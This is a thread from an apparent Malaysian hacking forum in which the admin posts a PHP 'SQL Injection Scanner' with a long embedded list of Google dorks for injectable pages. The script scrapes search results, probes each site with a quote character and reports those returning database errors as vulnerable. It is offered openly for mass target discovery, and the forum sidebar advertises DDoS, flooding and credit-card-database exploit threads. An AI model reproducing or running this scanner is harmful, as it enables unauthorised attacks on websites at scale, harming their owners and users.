Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 SQL Injection Scanner By XShimeX

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2626
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: SQL Injection Scanner By XShimeX   Mon Feb 28, 2011 1:50 pm

SQL Injection Scanner By XShimeX

Code :

Code:
<?php
  /**
    * SQL Injection Scanner
    * PHP Version By XShimeX
    * Version 1.0
    * Thanks To: TBDSecurity.Com, HMSecurity.org, All my friends, And ALLAH.
  */
  set_time_limit(0);
 
  $vuln = 0;
  $not_vuln = 0;
  $total = 0;
 
  print "[+] SQL Injection Scanner PHP Version\n";
  print "[+] Version 1.0 By XShimeX\n";
 
  if(!$argv[1]) {
      print "[%] Usage: $argv[0] <dork>\n";
      print "[%] Example : $argv[0] inurl:news.php?id=\n
      Sqli Dork by MR lock a.k.a haikalxy
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id= ";
      exit;
  }
 
  /**
  * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
  */
 
  $bug = array(
  'You have an error in your SQL','Division by zero in',
  'supplied argument is not a valid MySQL result resource in',
  'Call to a member function','Microsoft JET Database',
  'ODBC Microsoft Access Driver',
  'Microsoft OLE DB Provider for SQL Server',
  'Unclosed quotation mark',
  'Microsoft OLE DB Provider for Oracle',
  'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
  'Incorrect syntax near'
  );
 
  print "[@] Start Finding Links...\n";
  for($i = 0; $i <= 900; $i += 100) {
      $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N");
      @preg_match_all("/<h3 class=(.*?)><a href="(.*?)" class=(.*?)>/", $fp, $links);
      $url[] = $links[2];
  }
  print "[@] Done Finding Links...\n";
  print "[@] Now searching for Vulnerable\n";
  foreach($url as $key) {
      foreach($key as $value) {
        $fp = @file_get_contents($value."'");
        foreach($bug as $error) {
            if(@preg_match("/$error/", $fp)) {
              print "[#] Posibble SQL Injection: $value'\n";
              $vuln++;
            } else {
              $not_vuln++;
            }
        $total++;
        }
      }
  }
  print "[@] Done Scanning\n";
  print "[%] Result\n";
  print "[-] Total Vulnerable: $vuln\n";
  print "[-] Total Not Vulnerable : $not_vuln\n";
  print "[-] Total scanned Website: $total\n";
  print "Enjoy :)\n";
 
?>

Thanks,

wackwall
Back to top Go down
View user profile http://malaysia.1talk.net
ej22s



Posts : 1
Points : 1898
Reputation : 0
Join date : 01/10/2011
Location Location : africa

PostSubject: sql injection   Sat Oct 01, 2011 7:23 pm

sorry for asking, i am a noob in this area but not in hacking with softwares, i have gone through this code and it is excellent but how do i use it?please can you send me the instruction to my email @ eji.ayanga @ gmail.com

You are doing a wonderful job.

Thank you.
Back to top Go down
View user profile
sucide_bomber
New User
New User


Posts : 23
Points : 2058
Reputation : 0
Join date : 20/05/2011
Location Location : l4nd 0f h34d hunt3r

PostSubject: Re: SQL Injection Scanner By XShimeX   Mon Oct 24, 2011 6:22 pm

cantik...dah test tanam ke bro...
Back to top Go down
View user profile
Sponsored content




PostSubject: Re: SQL Injection Scanner By XShimeX   Today at 2:32 am

Back to top Go down
 
SQL Injection Scanner By XShimeX
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: h4ck3d :: Tools-
Jump to: